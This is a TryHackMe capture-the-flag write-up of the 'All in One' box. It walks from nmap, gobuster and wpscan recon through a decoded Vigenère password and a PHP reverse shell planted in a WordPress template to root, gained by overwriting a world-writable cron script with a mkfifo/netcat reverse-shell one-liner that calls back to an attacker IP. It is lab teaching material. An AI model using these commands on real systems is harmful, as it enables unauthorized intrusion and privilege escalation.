All in One - TryHackMe writeup

The All in One box is a multi-path box for users to try out multiple approaches. Link to TryHackMe box

Recon

First, as always, we fire up nmap, with the usual (-A for scripts and versioning, -oA to output our results)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Nmap scan report for 10.10.20.32
Host is up (0.050s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.3.###
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
| 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

As we can see, there are 3 ports open. 21 FTP, 22 SSH, and 80 HTTP. The -A in our scan gave us a title for the HTTP page. We can see it’s just an Apache2 default page. This means we should fire up gobuster to learn more about what may be lurking.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.20.32
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/07 19:09:02 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
===============================================================
2021/02/07 19:17:01 Finished
===============================================================

While that’s going on, we also see that FTP has anonymous login allowed. Let’s see what’s on there!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
~ ftp 10.10.20.32
Connected to 10.10.20.32.
220 (vsFTPd 3.0.3)
Name (10.10.20.32:m4iler): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 ..
226 Directory send OK.

That’s a bit disappointing, I thought the root.txt would be right in there. Welp, can’t be helped.

Wordpress

All righty! GoBuster shows us two different URLs: /wordpress and /hackathons. The Wordpress site seems like a good find, let’s run wpscan against it!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.20.32/wordpress/ [10.10.20.32]
[+] Started: Sun Feb 7 19:22:09 2021

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://10.10.20.32/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.20.32/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.20.32/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.20.32/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Atom Generator (Aggressive Detection)
| - http://10.10.20.32/wordpress/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.5.1">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-admin/load-styles.php, Match: '5.5.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
| Location: http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/
| Latest Version: 3.1.7 (up to date)
| Last Updated: 2019-05-10T16:05:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <========================================> (22 / 22) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 7 19:22:13 2021
[+] Requests Done: 32
[+] Cached Requests: 26
[+] Data Sent: 8.812 KB
[+] Data Received: 10.017 KB
[+] Memory used: 161.727 MB
[+] Elapsed time: 00:00:04

Mail Masta

Well that’s a lot of text to churn through. Let’s focus on Mail Masta first.

Looking at searchsploit, we have 2 exploits for mail masta, an LFI and a SQL injection.

1
2
3
4
5
6
7
------------------------------------------------------------ ----------------------
Exploit Title | Path
------------------------------------------------------------ ----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt
------------------------------------------------------------ ----------------------
Shellcodes: No Results

Okay, from the LFI exploit, we can read system data (but only data accessible to www-data, since that’s who we’re running the server as). This means I could read /etc/passwd, which gave me some information about the user elyana. The SQLi exploit gave us a table, but I couldn’t grab any data from it. Might come around to it later.

Okay, since we got SOME info from Mail masta, let’s see if there’s any dirt on Reflex gallery. Running searchsploit again gives us some ideas:

1
2
3
4
5
6
7
--------------------------------------------------------------------- -----------------------
Exploit Title | Path
--------------------------------------------------------------------- -----------------------
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) | php/remote/36809.rb
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload | php/webapps/36374.txt
--------------------------------------------------------------------- -----------------------
Shellcodes: No Results

Okay, from the WPscan output we know this exploit is for 3.1.3 and the current version running is 3.1.7. No dice (and yes, I’ve tried it in msfconsole before typing this out, suuuuure). Let’s look elsewhere.

The Vinegar hackathon

There was one more directory we haven’t seen so far: /hackathons. Well, it may be more help, eh?

Or... maybe not

Damn. There can’t just be this one sentence! If only there were something we could do to see if there is anything written on the site just to check if the box creator left us any clues!

In the source code of the website we find two lines. One with a jumble of text, the other with something that looks like a key.

The page says they hate vinegar. Well, I’m not fond of it either. Maybe it’s wordplay?

The Vigenére cipher

The Vigenére cipher remained unbroken for a total of 300 years. Now, we have the ciphertext and we’re not in the 18th century, so we should be able to crack it. The second line of the text can be tried as a deciphering key, and with that, we get a phrase saying Try #########. Tie that in with our username, and we have something we can put in a login box!

eloysa:##########

After putting this in, we get into the Wordpress admin panel!

(NOTE: You can read more about Vigenére ciphers here

Poppin’ shells

From Wordpress, we can do a lot. Blog about puppies and rainbows, let the world know of its impending doom… or just wreak havoc.

There are many ways to get where we want, but the one I chose was manually editing the 404.php template in the theme used. I simply replaced the theme’s 404.php with PentestMonkey’s reverse shell, edited the IP and port to match my netcat listener, and off to the races we go.

1
2
3
4
5
6
7
8
9
nc -lnvp 5050
listening on [any] 5050 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 34002
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:28:10 up 1:26, 0 users, load average: 0.04, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

This is very good starting point. We can’t read eloysa’s user.txt file, not to speak of the root.txt, but we’ll get there. How? LinPEAS.

Privilege escalation

LinPEAS the helpful

Using LinPEAS is simple, yet very powerful. It basically runs several commands, enumerating each one and checking if it’s exploitable. All in a small script that can be easily transported via wget and some python magic.

On the attacker:

1
2
3
4
5
cd tools
ls
linpeas.sh php-reverse-shell.php
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the server to be recon’d:

1
wget 10.11.3.###:8000/linpeas.sh

Now that we have the LinPEAS script, just chmod +x it, and run with ./linpeas.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
bash-4.4$ ./linpeas.sh
./linpeas.sh
Starting linpeas. Caching Writable Folders...

▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
linpeas v2.8.7 by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username


====================================( Basic information )=====================================
OS: Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: elyana
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . DONE
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
**[SNIBBEDY SNIB]**
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Aug 6 2020 .
drwxr-xr-x 98 root root 4096 Oct 9 08:38 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root /var/backups/script.sh

I had to snibbedy snib part of the output (it really gives you a LOT), but I left in the one thing we found. A cron job running every minute as root. Let’s see what it’s about!

Admins Anonymous

1
2
3
4
5
6
7
8
9
bash-4.4$ ls -hal /var/backups
ls -hal /var/backups
total 52K
drwxr-xr-x 2 root root 4.0K Oct 7 13:41 .
drwxr-xr-x 14 root root 4.0K Oct 5 19:43 ..
-rw-r--r-- 1 root root 33K Oct 6 11:57 apt.extended_states.0
-rw-r--r-- 1 root root 3.5K Oct 5 21:07 apt.extended_states.1.gz
-rwxrwxrwx 1 root root 79 Feb 7 19:46 script.sh
bash-4.4$

Oh lawdy! 777 permissions on a file run by root? Don’t mind if I do!

What’s the actual content?

1
2
3
4
5
bash-4.4$ cat script.sh
cat script.sh
#!/bin/bash

#Just a test script, might use it later to for a cron task

Well diddly darn it, there is nothing important in the file at the moment. The note also says it’s going to be used later. As an undocumented administrator, it will be an honor to help my fellow admins.

Replacing the empty script with a simple reverse shell (courtesy of PayloadsAllTheThings, we can turn an innocuous piece of code into a root reverse shell, bypassing the eloysa user entirely.

1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.### 4242 >/tmp/f" > script.sh

Then, because the script runs every minute, we just have to start a netcat listener to capture our reverse shell.

1
nc -lnvp 4242

And, several seconds to a minute later, we get our shell back. W00T W00T!

1
2
3
4
5
6
7
nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 37722
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#

Closing notes

This is labelled an easy box, said to have “multiple possible routes to root, both intentional and unintentional”. I have only found and documented one, but there may be more (seems to me that the FTP server should be another way in). However, the time being what it is (past my bedtime), I will not focus on all the routes in this writeup.

This box has shown me something that may be very useful to real-life pentests: The way may not be always straight ahead. The LFI exploit gave us a username, but no password. The /hackathons directory gave us a password, but no username. We went down several possible rabbit holes (not too deep ones, though), and needed to perform multiple recon passes in order to get something useful.

All in all, huge props to i7m4d for making this amazing box. I have to apologize for my attitude concerning this multi-route box, but it’s way too late for me to run through all of it again and again and again.